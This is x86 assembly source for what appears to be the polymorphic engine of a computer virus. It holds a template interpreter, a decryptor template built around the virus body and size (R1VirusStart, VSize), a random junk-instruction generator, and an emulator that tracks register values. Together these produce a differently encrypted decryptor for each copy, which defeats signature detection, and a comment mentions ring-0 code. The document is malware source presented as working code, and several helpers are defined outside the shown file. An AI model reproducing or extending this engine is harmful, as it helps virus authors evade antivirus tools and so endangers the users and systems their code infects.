|
||
; eax = size of the created code
|
||
|
||
; Defined opcode looks
|
||
Op_add equ 'add '
|
||
Op_and equ 'and '
|
||
Op_mov equ 'mov '
|
||
Op_or equ 'or '
|
||
Op_sub equ 'sub '
|
||
Op_xor equ 'xor '
|
||
|
||
|
||
Op_cmp equ 'cmp '
|
||
Op_jnz equ 'jnz '
|
||
Op_jnb equ 'jnb '
|
||
Op_jna equ 'jna '
|
||
Op_jmp equ 'jmp '
|
||
|
||
Op_offset equ 'ofs '
|
||
Op_db equ 'db ' ; output whats in there,
|
||
; dont polymorph,
|
||
; dont compile
|
||
|
||
Op_dontparse equ '!emu' ; dont polymorph only
|
||
; compile
|
||
|
||
|
||
; special opcodes
|
||
Op_encrypt equ 'cpt ' ; encrypt this operand,
|
||
; used to create encryptor/
|
||
; decryptor
|
||
|
||
Op_setinfo equ 'nfo ' ; set info of operand
|
||
; used to define a operand
|
||
; changable or similar.
|
||
Op_prefix equ 'pfx ' ; prefix, eg fs:, es: and
|
||
; similar. Will be deleted
|
||
; in future versions
|
||
|
||
Op_trash equ 'trsh' ; how much trash to be
|
||
; produced, use wisely
|
||
; to make your code better
|
||
; or when you need to save
|
||
; the flags
|
||
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; LinkedListPolymorpher
; Expands a linked-list template (format described at TablePolymorpher,
; instances at Decryptor and Guide) into intermediate text.
; In:    esi = template, edi = output, ebp = delta
; Out:   esi -> created data, edi -> end of created data
;-----------------------------------------------------------------------
LinkedListPolymorpher:
        call    TablePolymorpher                ; 'old' style polymorphics

        ; esi -> created data
        ; edi -> created data+sizeof (created data)+1
        ret
|
||
|
||
;-----------------------------------------------------------------------
; Polymorph
; Runs the generic engine over intermediate text: MutateCode, Optimize,
; then Compile (to obtain the size of the produced code).
; In:    esi = text to polymorph, edi = output area, ebp = delta
; Out:   esi = start of created data (edi rounded up to 16)
;        edi = end of created data, as left by Optimize
;        eax = whatever Compile returns (the size of the created code,
;              per the header comment above this section)
; Optimize and Compile are defined elsewhere in the file.
;-----------------------------------------------------------------------
Polymorph:
        add     edi,16
        and     edi,0fffffff0h                  ; align the output up to 16
        push    edi                             ; saved: returned in esi
        push    edi                             ; saved: restored for Optimize

        call    MutateCode                      ; Generic polymorphing
        pop     edi
        ; esi -> created data
        call    Optimize                        ; Optimize the created code

        ; esi -> created data
        ; edi -> created data+sizeof (created data)+1
        push    edi

        call    Compile                         ; compile the code to get
                                                ; the size

        pop     edi
        pop     esi
        ret
|
||
|
||
|
||
|
||
|
||
Regs equ 6
|
||
Registers equ Regs
|
||
InfoPtr equ 16
|
||
|
||
|
||
|
||
|
||
|
||
; This polymorpher is a bit different from the usual one.
|
||
; It's able to create code that does different things, not just
|
||
; the same with a different look.
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; TablePolymorpher
; Interpreter for the linked-list templates.  Node format (see the
; Decryptor/Guide tables):
;   db  n          ; n literal bytes to copy to the output
;   ...            ; the bytes
;   db  k          ; number of alternatives (0 = end of node)
;   dd  off * k    ; file offsets of the alternative nodes; one is picked
;                  ; at random and interpreted, then parsing resumes after
;                  ; the list (several "db k / dd ..." groups may chain)
; The output is terminated by two zero dwords.
; In:    esi = root node, edi = output, ebp = delta
; Out:   esi = start of output, edi = after the terminator
; Clobb: eax, ebx, ecx, flags; the stack holds the recursion
; Random is defined elsewhere.  It is assumed to return in eax an index
; below the count just read, and to leave the upper bytes of eax and ecx
; zero (lodsb / mov cl only set the low byte) -- TODO confirm.
;-----------------------------------------------------------------------
TablePolymorpher:
        ; A nice recursive function :)
        xor     eax,eax
        xor     ecx,ecx
        push    edi                             ; start of output
        push    0                               ; sentinel "return address"
ReadInstruction:                                ; 'execute' function
        mov     cl, byte ptr [esi]              ; How many bytes to output
        inc     esi
        rep     movsb

ParseCall:                                      ; end of this function,
                                                ; should we call an other
        lodsb                                   ; al = number of alternatives
        test    eax,eax
        jz      ReturnFromCall                  ; no, return

        lea     ebx,[esi+eax*4]                 ; esi after the offset list
        push    ebx                             ; push return address

        call    Random
        mov     esi,[esi+eax*4]                 ; address of the function
        add     esi,ebp
        jmp     ReadInstruction                 ; jmp to function 'executer'

ReturnFromCall:
        pop     esi                             ; return from main function
        test    esi,esi
        jnz     ParseCall                       ; 0 = the sentinel: all done

NoMoreParsing:
        xor     eax,eax
        stosd                                   ; terminator: two zero dwords
        stosd

        pop     esi                             ; esi = start of output
        ret
|
||
|
||
; Decryptor template, in the linked-list format interpreted by
; TablePolymorpher.  The literal text is the engine's mini-language (see
; the Op_* equates): "RX<n>" = random-register slot n, "R<n>" = a fixed
; register number, "N" + dd = immediate, "[N" + dd + "]" = memory slot n
; (seeded from Mem1Table), "trsh",c = filler count, "db ",c = c raw bytes,
; "!emu",c = c bytes copied but not mutated.
Decryptor:
        db      0                               ; no literal bytes in the root

        db      1                               ; one alternative: R0VSize
        dd      R0VSize
        ; dd R0Zero

        db      1
        dd      MovePoinerToProgramStart

        db      0                               ; end of the root node

MovePoinerToProgramStart:
        db      MovePoinerToProgramStartEnd-$-1 ; length of the literal text
        db      "trsh",LinesOfTrash

        db      "mov R1,[N"                     ; R1 = memory slot 1
        dd      1
        db      "]"

MovePoinerToProgramStartEnd:
        db      0                               ; no alternatives
|
||
|
||
|
||
R0VSize:
|
||
db R0VSizeEnd-$-1
|
||
db "mov RX0,N"
|
||
dd VSize
|
||
R0VSizeEnd:
|
||
|
||
db 2
|
||
dd R1VirusStart
|
||
dd R1VirusEnd
|
||
|
||
db 1
|
||
dd EncryptRX1
|
||
|
||
db 1
|
||
dd SubR0AndJump
|
||
db 0
|
||
|
||
SubR0AndJump:
|
||
db SubR0AndJumpEnd-$-1
|
||
db "db ",1 ; Bytes not to be morphed
|
||
popad
|
||
|
||
db "trsh",0
|
||
db "sub RX0,N"
|
||
dd 4
|
||
|
||
db "!emu",9 ; dont do anything about this
|
||
db "jnb N"
|
||
dd 0
|
||
SubR0AndJumpEnd:
|
||
db 0
|
||
|
||
R0Zero:
|
||
db R0ZeroEnd-$-1
|
||
db "mov RX0,N"
|
||
dd 0
|
||
R0ZeroEnd:
|
||
|
||
db 2
|
||
dd R1VirusStart
|
||
dd R1VirusEnd
|
||
|
||
db 1
|
||
dd EncryptRX1
|
||
|
||
db 1
|
||
dd AddR0AndJump
|
||
db 0
|
||
|
||
|
||
AddR0AndJump:
|
||
db AddR0AndJumpEnd-$-1
|
||
|
||
db "db ",1 ; Bytes not to be morphed
|
||
popad
|
||
|
||
db "add RX0,N"
|
||
dd 4
|
||
|
||
db "trsh",0
|
||
db "!emu",13 ; dont do anything about this
|
||
db "cmp RX0,N"
|
||
dd VSize
|
||
|
||
db "!emu",9 ; dont do anything about this
|
||
db "jna N"
|
||
dd 0
|
||
|
||
AddR0AndJumpEnd:
|
||
|
||
db 0
|
||
|
||
|
||
|
||
R1VirusStart:
|
||
db R1VirusStartEnd-$-1
|
||
db "mov RX1,[N"
|
||
dd 3
|
||
db "]"
|
||
|
||
db "ofs 0"
|
||
|
||
db "db ",1
|
||
pushad
|
||
|
||
db "nfo RX2"
|
||
dd Undefined
|
||
|
||
db "add RX1,RX0"
|
||
|
||
R1VirusStartEnd:
|
||
db 0
|
||
|
||
|
||
|
||
R1VirusEnd:
|
||
db R1VirusEndEnd-$-1
|
||
db "mov RX1,[N"
|
||
dd 3
|
||
db "]"
|
||
|
||
db "add RX1,N"
|
||
dd VSize
|
||
|
||
db "ofs 0"
|
||
|
||
db "db ",1
|
||
pushad
|
||
|
||
db "nfo RX2"
|
||
dd Undefined
|
||
|
||
db "sub RX1,RX0"
|
||
R1VirusEndEnd:
|
||
db 0
|
||
|
||
|
||
EncryptRX1:
|
||
db 0
|
||
|
||
|
||
db 1
|
||
dd RandomReg
|
||
db 0
|
||
|
||
|
||
OpcodeXor:
|
||
db 4
|
||
db "xor "
|
||
db 0
|
||
|
||
OpcodeAdd:
|
||
db 4
|
||
db "add "
|
||
db 0
|
||
|
||
OpcodeSub:
|
||
db 4
|
||
db "sub "
|
||
db 0
|
||
|
||
RandomReg:
|
||
db 0
|
||
db 1
|
||
dd RandomOpcode
|
||
|
||
db 1
|
||
dd RandomizeMemWithReg
|
||
db 0
|
||
|
||
RandomizeMemWithReg:
|
||
db RandomizeMemWithRegEnd-$-1
|
||
db "[RX1],N"
|
||
RandomNumber dd 0
|
||
RandomizeMemWithRegEnd:
|
||
db 0
|
||
|
||
|
||
|
||
RandomOpcode:
|
||
db 0
|
||
db 3
|
||
dd OpcodeXor
|
||
dd OpcodeAdd
|
||
dd OpcodeSub
|
||
db 0
|
||
|
||
|
||
|
||
|
||
|
||
Guide:
|
||
db DefinedTrash-$-1
|
||
db "trsh",LinesOfTrash
|
||
DefinedTrash:
|
||
|
||
db 1
|
||
; dd RandomEveryBoot
|
||
dd RandomEveryTime
|
||
|
||
db 1
|
||
dd MakeZeroOrEight
|
||
|
||
db 0
|
||
|
||
|
||
RandomEveryTime:
|
||
db RandomEveryTimeEnd-$-1
|
||
db "pfx ",64h ; prefix fs:
|
||
|
||
db "mov RX0,[N"
|
||
dd PointerToRandomMemory
|
||
db "]" ; mov X0, fs:[0ch]
|
||
RandomEveryTimeEnd:
|
||
db 0
|
||
|
||
RandomEveryBoot:
|
||
db RandomEveryBootEnd-$-1
|
||
db "nfo R"
|
||
RandomEveryBootEnd:
|
||
db 3
|
||
dd RndEcx
|
||
dd RndEdi
|
||
dd RndEsi
|
||
|
||
db 0
|
||
|
||
RndEcx:
|
||
db RndEcxEnd-$-1
|
||
db "3"
|
||
dd Undefined
|
||
db "mov RX0,R3"
|
||
RndEcxEnd:
|
||
db 0
|
||
|
||
|
||
RndEdi:
|
||
db RndEdiEnd-$-1
|
||
db "5"
|
||
dd Undefined
|
||
db "mov RX0,R5"
|
||
RndEdiEnd:
|
||
db 0
|
||
|
||
RndEsi:
|
||
db RndEsiEnd-$-1
|
||
db "6"
|
||
dd Undefined
|
||
db "mov RX0,R6"
|
||
RndEsiEnd:
|
||
db 0
|
||
|
||
MakeZeroOrEight:
|
||
db MakeZeroOrEight-$-1
|
||
|
||
db "and RX0,N"
|
||
dd 8
|
||
|
||
db "add RX0,[N" ; special variable 1 =
|
||
dd 1 ; pointer to jump table
|
||
|
||
db "]"
|
||
db "jmp [RX0]" ; jmp [X0]
|
||
MakeZeroOrEightEnd:
|
||
db 0
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
; ---------------------------------------------
|
||
; ---------------- MutateCode -----------------
|
||
; ---------------------------------------------
|
||
; ------------- Local variables
|
||
|
||
Prefix dd 0
|
||
|
||
EndWhere:
|
||
Trash dd 0
|
||
ToReg dd 0
|
||
ToMemValue dd 0
|
||
ToMemReg dd 0
|
||
|
||
FromWhere:
|
||
FromValue dd 0
|
||
FromReg dd 0
|
||
FromMemValue dd 0
|
||
FromMemReg dd 0
|
||
|
||
TempWhere:
|
||
TempValue dd 0
|
||
TempReg dd 0
|
||
TestMemValue dd 0
|
||
TestMemReg dd 0
|
||
|
||
Temp1 dd 0
|
||
Temp2 dd 0
|
||
|
||
|
||
Writeable equ 1b
|
||
Undefined equ 10b ; it has an unknown value
|
||
Uninitialized equ -1
|
||
TableSize equ EbxTable-EaxTable
|
||
|
||
EndValue dd 0
|
||
EndTypeOfValue dd 0
|
||
|
||
|
||
Tables: ; pointers to the different
|
||
; tables
|
||
RegTables dd EaxTable
|
||
MemoryTables dd 0 ; Is allocated later
|
||
StackTables dd 0 ; first table is EspTable
|
||
|
||
EaxTable:
|
||
EaxValueNumber dd 0
|
||
EaxValueReg dd 0
|
||
EaxMemoryNumber dd 0
|
||
EaxMemoryReg dd 0
|
||
EaxInformation dd Undefined+Writeable
|
||
|
||
EbxTable:
|
||
dd 0,0,0,0, Undefined+Writeable
|
||
EcxTable:
|
||
dd 0,0,0,0, Undefined+Writeable
|
||
EdxTable:
|
||
dd 0,0,0,0, Undefined+Writeable
|
||
EsiTable:
|
||
dd 0,0,0,0, Undefined+Writeable
|
||
EdiTable:
|
||
dd 0,0,0,0, Undefined+Writeable
|
||
|
||
; this table is copied to mem, its used to define
|
||
; starting values for the memory
|
||
; Undefined mem start as Undefined+Writeable (you could change this to
|
||
; only writable for slightly better code.)
|
||
|
||
Mem1Table:
|
||
db 4 ; how many tables
|
||
|
||
db 0 ; which table
|
||
dd 0,0,0,0, Undefined ; program entry point
|
||
|
||
db 1
|
||
dd 0,0,0,0, Undefined ; pointer to mem 0
|
||
|
||
db 2
|
||
dd 0,0,0,0, Undefined ; decryptor entry point
|
||
|
||
db 3
|
||
dd 0,0,0,0, Undefined ; where to start decrypt
|
||
|
||
|
||
RandomRegs:
|
||
dd Registers dup (-1) ; Random Regs
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; MutateCode
; Generic polymorphing driver: resets the per-instruction scratch
; variables (EndWhere .. FromMemReg, 8 dwords, to -1 = Uninitialized) and
; calls Parse on the next record of the intermediate text, until Parse
; meets an opcode it does not know and jumps to MutateEnd.
; In:    esi = text, edi = output, ebp = delta
; Out:   esi = start of output rounded up to 16 (+16)
;        edi = end of output + 10
;        eax = the discarded Parse return address (not meaningful)
; Note:  MutateEnd is reached from inside Parse (see ParseInstruction), so
;        it pops Parse's return address itself.
;-----------------------------------------------------------------------
MutateCode:
        push    edi                             ; start of output

MorphCodeLoop:
        xor     eax,eax
        dec     eax                             ; eax = -1 (Uninitialized)
        push    edi
        lea     edi,[ebp+EndWhere]
        mov     ecx,8                           ; Trash .. FromMemReg
        rep     stosd
        pop     edi

        call    Parse
        jmp     MorphCodeLoop

MutateEnd:
        pop     eax                             ; return address of Parse
        pop     esi                             ; the saved output start
        add     esi,16
        and     esi,0fffffff0h
        add     edi,10
        ret
|
||
|
||
|
||
|
||
|
||
|
||
|
||
; ----------------------- Parser
|
||
|
||
; Dispatch tables for Parse.  Each opcode table starts with a dword count
; equal to (number of opcodes + 1): Parse runs repnz scasd with that count,
; so on a hit ecx = (number of opcodes - index), and the handler is located
; by indexing *backwards* from the end of the procedure / instruction
; table (see Parse and ParseInstruction).  Keep the opcode lists and the
; handler lists in the same order.
ParseSpecialVariables:
        dd      (ParseSpecialVariablesEnd-ParseSpecialVariables-4)/4+1
        dd      Op_db, Op_encrypt, Op_setinfo, Op_offset, Op_prefix
        dd      Op_trash,Op_dontparse,Op_jmp
ParseSpecialVariablesEnd:

ParseSpecialProcedures:                         ; handlers, same order as the opcodes above
        dd      ParseDeclareByte, ParseEncrypt, ParseChangeInfo
        dd      ParseSaveOffset, ParsePrefix, ParseTrash, ParseDontParse
        dd      TemporaryParseJump
ParseSpecialProceduresEnd:

ParseInstructionData:
        dd      (ParseInstructionDataEnd-ParseInstructionData-4)/4+1
        dd      Op_add, Op_mov, Op_sub, Op_or, Op_xor, Op_and
ParseInstructionDataEnd:
|
||
|
||
|
||
|
||
|
||
|
||
AddPos equ 0
|
||
MovPos equ 1
|
||
SubPos equ 2
|
||
OrPos equ 3
|
||
XorPos equ 4
|
||
AndPos equ 5
|
||
|
||
|
||
InstructionData:
|
||
AddInfo:
|
||
dd offset AddInstruction
|
||
dd Op_add
|
||
|
||
MovInfo:
|
||
dd offset MovInstruction
|
||
dd Op_mov
|
||
|
||
SubInfo:
|
||
dd offset SubInstruction
|
||
dd Op_sub
|
||
|
||
OrInfo:
|
||
dd offset OrInstruction
|
||
dd Op_or
|
||
|
||
XorInfo:
|
||
dd offset XorInstruction
|
||
dd Op_xor
|
||
|
||
AndInfo:
|
||
dd offset AndInstruction
|
||
dd Op_and
|
||
|
||
|
||
|
||
|
||
InstuctionTablesEnd:
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; Parse
; Reads one 4-byte opcode from the text at esi and dispatches it: special
; opcodes (ParseSpecialVariables) jump to their handler with edi restored;
; anything else falls through to ParseInstruction.
; In:    esi = text (positioned at an opcode), edi = output, ebp = delta
; Out:   esi advanced past the record; edi advanced by the handler
; Clobb: eax, ebx, ecx, flags
; Note:  the opcode is bswap'ed so the text bytes ("db  ", "mov " ...)
;        compare equal to the Op_* dword constants.
;-----------------------------------------------------------------------
Parse:
        push    edi                             ; popped below or by ParseInstruction
        mov     ecx,[ParseSpecialVariables+ebp] ; ecx = opcode count + 1
        lea     edi,[ParseSpecialVariables+ebp+4]

        lodsd
        bswap   eax

        repnz   scasd
        test    ecx,ecx
        jz      ParseInstruction                ; not a special opcode

        pop     edi
        lea     ebx,[ParseSpecialProceduresEnd+ebp]
        imul    ecx,ecx,4
        sub     ebx,ecx                         ; ebx -> handler slot (indexed from the end)
        mov     ebx,[ebx]
        add     ebx,ebp                         ; relocate the handler address
        jmp     ebx                             ; the handler returns to Parse's caller
|
||
|
||
|
||
; "db" statement: raw bytes copied through unchanged.
; Source: count byte, then count bytes.  Output: Op_db entry (new
; 16-byte slot via OutputOnlyOpcode), count byte, the bytes.
ParseDeclareByte:
mov edx,Op_db
call OutputOnlyOpcode
xor eax,eax
lodsb
mov ecx,eax
stosb ; number of bytes to declare
rep movsb
ret
|
||
|
||
; "encrypt" statement: consumes one operand and emits nothing here.
; GetOperand is not in this part of the file (the commented listing
; further down says it lives in the ring-0 copy of the code).
ParseEncrypt:
call GetOperand
ret
|
||
|
||
; "setinfo" statement: an operand followed by a dword of attribute bits,
; stored into that operand's attribute word via ChangeInfo.
; eax is preset to 666666h before GetOperand; what GetOperand does with
; it is not visible here — treat as unknown.
ParseChangeInfo:
mov eax,666666h
call GetOperand                 ; eax = operand, ebx = table selector
mov ecx,eax
lodsd                           ; eax = new attribute dword
xchg eax,ecx                    ; eax = operand, ecx = attributes
call ChangeInfo
ret
|
||
|
||
; "offset" statement: Op_offset entry followed by one raw source byte
; (an identifier for a later pass; not resolved here).
ParseSaveOffset:
mov edx,Op_offset
call OutputOnlyOpcode
movsb
ret
|
||
|
||
; "prefix" statement: one byte stored in Prefix.  OutputPrefix emits it
; as a one-byte db entry in front of the next instruction and clears it.
ParsePrefix:
xor eax,eax
lodsb
mov [Prefix+ebp],eax
ret
|
||
|
||
; "trash" statement: one byte -> HowMuchTrash.  GenerateTrash stops with
; probability 1/(HowMuchTrash+1) per round.
ParseTrash:
xor eax,eax
lodsb
mov [HowMuchTrash+ebp],eax
ret
|
||
|
||
; "dontparse" statement: count byte, then count bytes copied verbatim
; into a fresh 16-byte-aligned slot (a pre-formatted entry, not re-parsed).
ParseDontParse:
xor eax,eax
lodsb
mov ecx,eax
add edi,16
and edi,0fffffff0h
rep movsb
ret
|
||
|
||
; "jmp" statement (temporary form): builds a "jmp [Rn]" entry by hand —
; Op_jmp, then the text "[R", the register digit and "]" assembled in
; eax and stored little-endian.  The register index comes from GetOperand.
TemporaryParseJump:
add edi,16
and edi,0fffffff0h              ; next 16-byte slot

call OutputPrefix
mov eax,Op_jmp
bswap eax
stosd

call GetOperand                 ; eax = register index

add eax,'0'                     ; digit
add eax,']'*256
shl eax,16                      ; high word = digit, ']'
mov ax,'R['                     ; low word stores as '[','R'
stosd                           ; -> "[R<n>]"
ret
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; ParseInstruction — generic "<op> dst,src" statement.
; An unknown mnemonic terminates mutation (jump to MutateEnd); that is
; the only way out of MorphCodeLoop.  Operand types from GetOperand
; (per the comment block further down): 0 number, 4 register, +8 for
; the bracketed form.  Stack while parsing: InstructionData entry,
; ToType, ToOperand, FromType, FromOperand.
;-----------------------------------------------------------------------
ParseInstruction:
mov ecx,[ParseInstructionData+ebp]
lea edi,[ParseInstructionData+ebp+4]
repnz scasd
pop edi                         ; edi saved by Parse
test ecx,ecx
jz MutateEnd                    ; not an instruction either -> end of source


lea ebx,[InstuctionTablesEnd+ebp]
imul ecx,ecx,8

sub ebx,ecx                     ; ebx -> InstructionData[index] (same trick as Parse)
push ebx

ParseOperands:
call GetOperand                 ; destination: eax = operand, ebx = type
sub ebx,4                       ; 4 (register) -> 0, 12 ([register]) -> 8: table selector for GetTable

push ebx ; ToType
push eax ; ToOperand

inc esi                         ; skip the ',' between operands
call GetOperand                 ; source
push ebx ; FromTypeOfValue
push eax ; FromOperand

mov [EndValue+ebp],eax          ; RandomOperand offers the real source as a trash operand
mov [EndTypeOfValue+ebp],ebx

call GenerateTrash              ; trash before the real instruction

mov eax,[esp+8] ; ToOperand
mov ebx,[esp+12] ; ToType
mov ecx,Writeable
call DeleteFromInfo             ; destination must not be clobbered by later trash

pop [FromOperand+ebp]
pop [FromTypeOfValue+ebp]

pop eax
pop ebx
mov [ToOperand+ebp],eax
mov [ToType+ebp],ebx

mov ecx,Writeable
call DeleteFromInfo             ; same eax/ebx as above: a repeat of the previous call


pop [EmulateInstruction+ebp]    ; InstructionData entry pushed earlier

call OutputPrefix
call EmuProc                    ; emit "op dst,src" and update the emulated tables

call GenerateTrash              ; trash after the real instruction
ret
|
||
|
||
|
||
; return
|
||
; eax = register or number
|
||
; ebx =
|
||
; 0 = value/number
|
||
; 4 = value/register
|
||
; 8 = memory/number
|
||
; 12 = memory/register
|
||
|
||
|
||
; return
|
||
; EBX = 0 if value and 4 if memory
|
||
; |'V' or 'M'
|
||
; |
|
||
; db "M"
|
||
; ReadTypeOfData — read one byte; ebx = 8 if it is 'M' (memory), else 0.
; The comment above says 4 for memory; the code shifts by 3, i.e. 8,
; which is the memory bit used by FromTypeOfValue.  Not referenced in
; this part of the file.
ReadTypeOfData:
xor eax,eax
xor ebx,ebx
lodsb
cmp al,'M'
sete bl
shl bl,3
ret
|
||
|
||
; return
|
||
; EAX = the number or register
|
||
; EBX = 0 if number and 4 if register
|
||
|
||
; This procedure is in the "copy to ring 0" mem.
|
||
|
||
;GetOperand:
|
||
; xor edx,edx
|
||
; mov al,byte ptr [esi]
|
||
; cmp al,'['
|
||
; setz dl
|
||
; mov ecx,edx
|
||
; add esi,edx
|
||
; shl edx,3
|
||
; mov ebx,edx ; ebx = 0 or 8
|
||
|
||
; lodsb
|
||
; cmp al,'S' ; A variable
|
||
; jnz Label53
|
||
|
||
; mov eax,[PointerToDataSlack+ebp]
|
||
; mov edx,[esi]
|
||
; mov eax,[eax+edx*4]
|
||
; mov [esi],eax
|
||
; mov eax,'V'
|
||
; xor edx,edx
|
||
;
|
||
; Label53:
|
||
; cmp al,'R'
|
||
; setz dl
|
||
; shl edx,2
|
||
; add ebx,edx ; ebx = ebx + (0 or 4)
|
||
;
|
||
; test edx,edx ; is value
|
||
; jz ReadValue
|
||
;
|
||
; xor eax,eax
|
||
; lodsb ; read register
|
||
|
||
; cmp al,'X'
|
||
; jz GetRandomReg
|
||
|
||
; sub eax,'0'
|
||
|
||
; add esi,ecx
|
||
; ret
|
||
|
||
; ReadValue:
|
||
; lodsd
|
||
; add esi,ecx
|
||
; ret
|
||
|
||
|
||
;-----------------------------------------------------------------------
; GetRandomReg — resolve a random-register placeholder "Xn" (entered
; from GetOperand, which is not in this part of the file).  RandomRegs[n]
; caches the register chosen for placeholder n so every later "Xn" maps
; to the same real register.
; In:  esi -> digits after 'X', ecx = 1 if the operand was bracketed
;      (closing ']' to skip), ebx = type bits, returned unchanged
; Out: eax = register number, ebx preserved
;-----------------------------------------------------------------------
GetRandomReg:
push ebx
call AsciiToNum                 ; eax = n (AsciiToNum not visible here)
add esi,ecx
shl eax, 2
lea eax,[eax+ebp+RandomRegs] ; eax -> RandomReg
mov ebx,[eax]

cmp ebx,Uninitialized           ; RandomRegs is initialised with -1 at its definition
jz GetRandomRegPtrInitialize ; There is no RnR
; Xx, create one
xchg eax,ebx ; eax = Xx
pop ebx
ret

GetRandomRegPtrInitialize:
push eax                        ; -> RandomRegs[n]


call GetWriteableReg            ; eax = a register that carries Writeable
pop ebx

mov [ebx],eax ; Mov RR,Random Operand
pop ebx
ret
; -----------------------------------------------
|
||
; ---------------------------- Generic polymorher
|
||
; -----------------------------------------------
|
||
|
||
; This proc takes data from WhereFrom and WhereTo and
|
||
; creates instructions from that data.
|
||
|
||
HowMuchTrash dd LinesOfTrash    ; GenerateTrash continues with probability HowMuchTrash/(HowMuchTrash+1)

; Weighted choice of trash instruction for GenerateTrash:
;   byte   number of entries
;   byte   weight per entry (relative frequency)
;   dword  InstructionData position per entry
RandomProcs:
db 6 ; number of instructions

db 6 ; how often it should come up
db 2
db 1
db 1
db 1
db 1

dd MovPos
dd AddPos
dd SubPos
dd OrPos
dd XorPos
dd AndPos
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; GenerateTrash — emit zero or more random "junk" instructions that are
; also emulated, so the operand tables stay consistent with the output.
; Each round: 1/(HowMuchTrash+1) chance to stop; destination = a
; writeable operand, source = RandomOperand, opcode = weighted pick from
; RandomProcs; then EmuProc writes and emulates it.
; Clobbers eax, ebx, ecx, edx.
;-----------------------------------------------------------------------
GenerateTrash:
mov eax,[HowMuchTrash+ebp] ; 1/LinesOfTrash that we
; stop creating trash
inc eax
call Random                     ; eax in [0, HowMuchTrash]

test eax,eax
jz Return




call GetWriteable               ; destination: eax = operand, ebx = 0 (register) / 4 (memory)
mov [ToOperand+ebp],eax
mov [ToType+ebp],ebx

call RandomOperand              ; source (ebx = ToType in)
mov [FromOperand+ebp],eax
mov [FromTypeOfValue+ebp],ebx

lea ebx,[RandomProcs+ebp]

xor eax,eax
xor ecx,ecx
xor edx,edx
mov cl, byte ptr [ebx]          ; ecx = number of entries

Label36:                        ; eax = sum of the weights
inc ebx
mov dl, byte ptr [ebx]
add eax,edx
loop Label36

call Random                     ; eax in [0, sum)

lea ebx,[RandomProcs+ebp]

Label37:                        ; subtract weights until the pick is exhausted
inc ebx
mov dl, byte ptr [ebx]
sub eax, edx
jnc Label37

lea eax,[RandomProcs+ebp]
sub ebx,eax
dec ebx                         ; ebx = chosen entry index
shl ebx,2
inc ebx                         ; skip the count byte

mov dl,byte ptr [eax]
add ebx,edx                     ; skip the weight bytes
add ebx,eax                     ; ebx -> dword position of the chosen entry

mov ebx,[ebx]

lea ebx,[InstructionData+ebx*8+ebp]

mov [EmulateInstruction+ebp],ebx
call EmuProc
jmp GenerateTrash
; ------------------------------------------------
|
||
; ---------------------------- Emulation functions
|
||
; ------------------------------------------------
|
||
|
||
; Emulation routines, called from EmuProc (YesChangeIt) with
;   eax -> the destination's table entry (from GetTable)
;   edx = slot offset selected by the source kind (0 number,
;         4 register, 8 [number], 12 [register]) = FromTypeOfValue
;   ecx = source operand (number, or register/memory index)
; An entry holds four dword slots, one per operand kind; all routines
; except mov touch only the slot edx selects.
AddInstruction:
add [eax+edx],ecx
ret

SubInstruction:
sub [eax+edx],ecx
ret

MovInstruction:
xor ebx,ebx
mov dword ptr [eax],ebx         ; mov replaces the whole value: clear every slot ...
mov dword ptr [eax+4],ebx
mov dword ptr [eax+8],ebx
mov dword ptr [eax+12],ebx

mov [eax+edx],ecx               ; ... then set the one the source selects

ret

OrInstruction:
or [eax+edx],ecx
ret

XorInstruction:
xor [eax+edx],ecx
ret

AndInstruction:
and [eax+edx],ecx
ret
|
||
|
||
; Parameters for EmuProc (filled by ParseInstruction and GenerateTrash).
EmulateInstruction dd 0         ; -> InstructionData entry (routine offset, opcode)

ToOperand dd 0                  ; destination operand index
ToType dd 0                     ; 0 = register table, 4 = memory table

FromOperand dd 0                ; source: number, or register/memory index
FromTypeOfValue dd 0            ; 0 number, 4 register, 8 [number], 12 [register]
|
||
|
||
;-----------------------------------------------------------------------
; EmuProc — write one "op dst,src" entry and update the emulated
; operand tables.  Steps:
;   1. OutputOpcode: opcode + destination text
;   2. UndefineDependentOperands (acts only when dst is flagged Undefined)
;   3. for mov: clear dst's Undefined flag (it receives a fresh value)
;   4. if dst is defined and its entry has no other nonzero slot than
;      the one the source kind allows, run the emulation routine;
;      otherwise flag dst Undefined
;   5. GetEqualValue may replace the source with an operand holding the
;      same emulated value; Output writes ",src"
;-----------------------------------------------------------------------
EmuProc:

ChangeRegPart:
mov eax,[ToOperand+ebp]
mov ebx,[ToType+ebp]

mov edx,[EmulateInstruction+ebp]
mov edx,[edx+4]                 ; opcode constant
shr ebx,2
inc ebx                         ; output kind: 1 = register, 2 = [number]
call OutputOpcode
dec ebx
shl ebx,2                       ; back to the table selector (0 / 4)

call UndefineDependentOperands

pushad
mov ebx,[EmulateInstruction+ebp]
mov ebx,[ebx+4]

cmp ebx,Op_mov
jnz Label34

mov eax,[ToOperand+ebp]
mov ebx,[ToType+ebp]
mov ecx,Undefined
call DeleteFromInfo             ; mov makes the destination defined again
Label34:
popad


call IsOperandUndefined         ; ZF set when dst is Undefined
jz ChangeOutput

call GetTable                   ; eax -> dst entry

mov ecx,[FromOperand+ebp]
mov edx,[FromTypeOfValue+ebp]

xor ebx,ebx

test edx,edx
jz ValueIsProperlyEmulated_DontNeedThisHack   ; numeric source: the number slot may be nonzero

add ebx,[eax]
ValueIsProperlyEmulated_DontNeedThisHack:
add ebx,[eax+4]
add ebx,[eax+8]
add ebx,[eax+12]
test ebx,ebx
jnz MakeUndefined               ; dst already holds other components: give up tracking it

YesChangeIt:
mov ebx,[EmulateInstruction+ebp]
mov ebx,[ebx]
add ebx,ebp
call ebx                        ; AddInstruction / MovInstruction / ...

ChangeOutput:
call GetEqualValue              ; eax/ebx = source operand to print

shr ebx,2                       ; 0 number, 1 register, 2 [number], 3 [register]

call Output
ret

MakeUndefined:
mov ebx,Undefined
or [eax+InfoPtr],ebx            ; eax still -> dst entry
jmp ChangeOutput
|
||
|
||
|
||
